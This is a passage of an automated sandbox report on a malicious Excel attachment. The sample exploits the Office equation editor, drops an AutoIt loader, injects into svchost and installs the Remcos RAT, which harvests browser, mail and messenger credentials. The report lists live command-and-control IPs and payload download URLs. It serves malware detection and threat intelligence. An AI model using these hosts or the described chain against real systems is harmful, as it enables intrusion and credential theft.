Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_000B1E70 mov eax, dword ptr fs:[00000030h] 11_2_000B1E70
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_002081D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 10_2_002081D4
Enables debug privileges
Source: C:\Windows\SysWOW64\svchost.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001DA2A4 SetUnhandledExceptionFilter, 10_2_001DA2A4
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001DA2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_001DA2D5
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_0128A2A4 SetUnhandledExceptionFilter, 11_2_0128A2A4
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_0128A2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_0128A2D5

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\svchost.exe Domain query: geoplugin.net
Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 107.173.4.16 2404 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 178.237.33.50 80 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\directory\name.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008 Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008 Jump to behavior
Contains functionality to execute programs as a different user
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_00208A73 LogonUserW, 10_2_00208A73
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001B3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 10_2_001B3B4C
Contains functionality to simulate keystroke presses
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001B4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 10_2_001B4A35
Contains functionality to simulate mouse events
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_00214CFA mouse_event, 10_2_00214CFA
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\taskhostw.exe "C:\Users\user\AppData\Roaming\taskhostw.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Roaming\taskhostw.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\taskhostw.exe" Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\slsrkklvishzfgljivqawntxyxjphjjhhw" Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\dnxjld" Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\nhlcmvhqk" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_002081D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 10_2_002081D4
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_00214A08 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 10_2_00214A08
Source: taskhostw.exe, 0000000A.00000000.449366301.0000000000264000.00000002.00000001.01000000.00000005.sdmp, taskhostw.exe, 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000000.453360398.0000000001314000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: taskhostw.exe, name.exe Binary or memory string: Shell_TrayWnd
Source: svchost.exe, 0000000C.00000002.1055307081.0000000000734000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A77BAB cpuid 10_3_02A77BAB
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_01295007 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 11_2_01295007
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001F215F GetUserNameW, 10_2_001F215F
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001E40BA __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 10_2_001E40BA
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001B4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 10_2_001B4AFE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Remcos RAT
Source: Yara match File source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.485970456.0000000000604000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1055307081.0000000000734000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: name.exe PID: 3328, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3316, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: name.exe PID: 3000, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 2176, type: MEMORYSTR
Searches for Windows Mail specific files
Source: C:\Windows\SysWOW64\svchost.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail * Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup * Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new * Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db Jump to behavior
Tries to steal Instant Messenger accounts or passwords
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail Jump to behavior
Yara detected WebBrowserPassView password recovery tool
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3316, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 2148, type: MEMORYSTR
OS version to string mapping found (often used in BOTs)
Source: name.exe Binary or memory string: WIN_81
Source: name.exe Binary or memory string: WIN_XP
Source: name.exe Binary or memory string: WIN_XPe
Source: name.exe Binary or memory string: WIN_VISTA
Source: name.exe Binary or memory string: WIN_7
Source: name.exe Binary or memory string: WIN_8
Source: taskhostw[1].exe.9.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality
barindex
Detected Remcos RAT
Source: C:\Windows\SysWOW64\svchost.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-FI789R Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-FI789R
Yara detected Remcos RAT
Source: Yara match File source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.485970456.0000000000604000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1055307081.0000000000734000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: name.exe PID: 3328, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3316, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: name.exe PID: 3000, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 2176, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_00226399 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 10_2_00226399
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_0022685D socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 10_2_0022685D
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012D6399 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 11_2_012D6399
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012D685D socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 11_2_012D685D
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1532154 Sample: PO-00006799868.xls Startdate: 12/10/2024 Architecture: WINDOWS Score: 100 61 shuvi.io 2->61 91 Suricata IDS alerts for network traffic 2->91 93 Found malware configuration 2->93 95 Malicious sample detected (through community Yara rule) 2->95 97 21 other signatures 2->97 10 EXCEL.EXE 61 39 2->10         started        14 wscript.exe 1 2->14         started        signatures3 process4 dnsIp5 73 shuvi.io 188.114.96.3, 443, 49161, 49166 CLOUDFLARENETUS European Union 10->73 75 104.168.7.25, 49162, 49169, 49170 AS-COLOCROSSINGUS United States 10->75 59 C:\Users\user\...\PO-00006799868.xls (copy), Composite 10->59 dropped 17 taskhostw.exe 6 10->17         started        21 WINWORD.EXE 348 31 10->21         started        127 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->127 24 name.exe 2 14->24         started        file6 signatures7 process8 dnsIp9 45 C:\Users\user\AppData\Local\...\name.exe, PE32 17->45 dropped 77 Binary is likely a compiled AutoIt script file 17->77 79 Machine Learning detection for dropped file 17->79 26 name.exe 3 17->26         started        69 shuvi.io 21->69 71 188.114.97.3, 443, 49163, 49164 CLOUDFLARENETUS European Union 21->71 47 C:\Users\user\AppData\...\shuvi.io.url, MS 21->47 dropped 49 C:\Users\user\AppData\Roaming\...\7al0eY.url, MS 21->49 dropped 51 ~WRF{8ACACCBE-F49B...F-59EF5D64236E}.tmp, Composite 21->51 dropped 81 Microsoft Office launches external ms-search protocol handler (WebDAV) 21->81 83 Office viewer loads remote template 21->83 85 Microsoft Office drops suspicious files 21->85 30 EQNEDT32.EXE 12 21->30         started        87 Writes to foreign memory regions 24->87 89 Maps a DLL or memory area into another process 24->89 32 svchost.exe 24->32         started        file10 signatures11 process12 file13 53 C:\Users\user\AppData\Roaming\...\name.vbs, data 26->53 dropped 113 Binary is likely a compiled AutoIt script file 26->113 115 Machine Learning detection for dropped file 26->115 117 Drops VBS files to the startup folder 26->117 125 3 other signatures 26->125 34 svchost.exe 3 10 26->34         started        55 C:\Users\user\AppData\Roaming\taskhostw.exe, PE32 30->55 dropped 57 C:\Users\user\AppData\...\taskhostw[1].exe, PE32 30->57 dropped 119 Office equation editor establishes network connection 30->119 121 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 30->121 123 Detected Remcos RAT 32->123 signatures14 process15 dnsIp16 63 geoplugin.net 34->63 65 geoplugin.net 178.237.33.50, 49173, 80 ATOM86-ASATOM86NL Netherlands 34->65 67 107.173.4.16, 2404, 49171, 49172 AS-COLOCROSSINGUS United States 34->67 99 System process connects to network (likely due to code injection or exploit) 34->99 101 Detected Remcos RAT 34->101 103 Maps a DLL or memory area into another process 34->103 38 svchost.exe 1 34->38         started        41 svchost.exe 1 34->41         started        43 svchost.exe 11 34->43         started        signatures17 process18 signatures19 105 Tries to steal Instant Messenger accounts or passwords 38->105 107 Tries to steal Mail credentials (via file / registry access) 38->107 109 Searches for Windows Mail specific files 38->109 111 Tries to harvest and steal browser information (history, passwords, etc) 41->111
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
188.114.97.3
 unknown European Union
13335 CLOUDFLARENETUS false
188.114.96.3
 shuvi.io European Union
13335 CLOUDFLARENETUS true
104.168.7.25
 unknown United States
36352 AS-COLOCROSSINGUS true
107.173.4.16
 unknown United States
36352 AS-COLOCROSSINGUS true
178.237.33.50
 geoplugin.net Netherlands
8455 ATOM86-ASATOM86NL true

Contacted Domains

Name IP Active
shuvi.io 188.114.96.3 true
geoplugin.net 178.237.33.50 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://104.168.7.25/450/taskhostw.exe true
    		unknown
    https://shuvi.io/7al0eY false unknown
    http://geoplugin.net/json.gp true
    • URL Reputation: safe
    		 unknown
    http://104.168.7.25/xampp/ew/wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat.doc true
      		unknown
      107.173.4.16 true
        		unknown